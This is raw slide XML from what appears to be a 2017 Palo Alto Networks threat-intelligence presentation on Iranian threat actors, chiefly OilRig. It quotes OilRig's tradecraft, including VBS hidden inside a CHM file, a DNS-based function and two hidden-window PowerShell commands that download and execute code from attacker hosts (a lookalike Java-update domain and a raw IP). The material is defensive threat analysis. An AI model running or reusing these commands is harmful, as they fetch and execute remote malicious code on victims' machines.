                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>").Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DnECmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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043467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317539" y="205981"/>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Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3082725" y="2229211"/>
            <a:ext cx="779360"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5518354" y="2229211"/>
            <a:ext cx="779361" cy="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3828465" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522663" y="1333257"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300423" y="1333258"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183118" y="2814320"/>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11485" y="3529803"/>
            <a:ext cx="8351236" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SendReceiveDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ($d)… (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="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28549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317539" y="205981"/>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3300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317539" y="197778"/>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Lesser known OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="4195" t="10379" r="16744" b="9345"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="125936" y="1443321"/>
            <a:ext cx="2812699" cy="711785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="58018" b="53449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253946" y="719549"/>
            <a:ext cx="3838833" cy="2394354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553252" y="2599902"/>
            <a:ext cx="924910" cy="327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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938635" y="1859054"/>
            <a:ext cx="566565" cy="643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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4942704" y="3113903"/>
            <a:ext cx="0" cy="6554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4125" y="3889450"/>
            <a:ext cx="6395584" cy="983075"/>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Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> VBS stored in sub file stored in Project_Domain_No337.chm/Samples/Catalogs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catalogs.sfl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6492240" y="4510832"/>
            <a:ext cx="49344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985688" y="3769360"/>
            <a:ext cx="1935084" cy="1157483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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Regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PowerShell payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1352052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r="10985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207615" y="1727336"/>
            <a:ext cx="5390545" cy="2946263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Signed OilRig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020648" y="282965"/>
            <a:ext cx="4473112" cy="3684928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406735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Agenda</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3</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Why should you care about Iranian threats?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Who are the main Iranian threat actors?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What do all those codenames mean anyway?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Closing thoughts</a:t>
            </a:r>
          </a:p>
          <a:p>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533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PowerShell Downloader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523830" y="1189875"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860857" y="1240676"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037841"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5303520"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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055188" y="1262265"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386444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PowerShell Downloader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225038" y="2625563"/>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960" y="3174203"/>
            <a:ext cx="8514081" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe /c powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w hidden -c "IEX ((new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net.webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'http://jpsrv-java-jdkec2.javaupdate.co:80/JPOST'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))" </a:t>
            </a:r>
            <a:endPar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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523830" y="1189875"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860857" y="1240676"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037841"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cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303520"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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055188" y="1262265"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2729685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4500878" y="2625563"/>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960" y="3174203"/>
            <a:ext cx="8514081" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w hidden -c "IEX ((new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net.webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'http://198.55.107.164:80/Sourcefire'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))" </a:t>
            </a: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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523830" y="1189875"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860857" y="1240676"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037841"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5303520"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6055188" y="1262265"/>
            <a:ext cx="1300593" cy="1300593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299867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13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705598" y="2733040"/>
